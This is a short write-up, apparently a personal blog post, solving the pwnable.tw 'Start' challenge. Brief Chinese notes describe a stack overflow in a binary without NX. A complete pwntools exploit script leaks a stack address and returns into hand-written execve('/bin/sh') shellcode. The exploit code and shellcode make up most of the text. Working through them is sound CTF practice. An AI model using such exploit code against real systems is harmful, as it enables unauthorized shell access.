[pwnable.tw] writeups

Start

  • 程序很简单,直接用汇编int 80实现的读写退出,没开NX保护,然后有个栈溢出漏洞,先泄漏栈地址,然后往栈里写shellcode,再return to shellcode即可

  • 这里我尝试自己写了个简单的shellcode

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *
context.log_level = 'debug'
p = process('./start')


p.recvuntil(' CTF:')
#gdb.attach(p)
p.send('a'*0x14 + p32(0x08048087))

leak_stack = u32(p.recv(4))
log.success("leak stack add: 0x%x"%leak_stack)

shellcode = asm(
'''
sub esp,0x60
push 0x0068732f
push 0x6e69622f
mov ebx, esp
mov eax, 0xb
xor cl, cl
xor dl, dl
int 0x80
'''
)

p.send('a'*0x14 + p32(leak_stack+0x14) + shellcode)

p.interactive()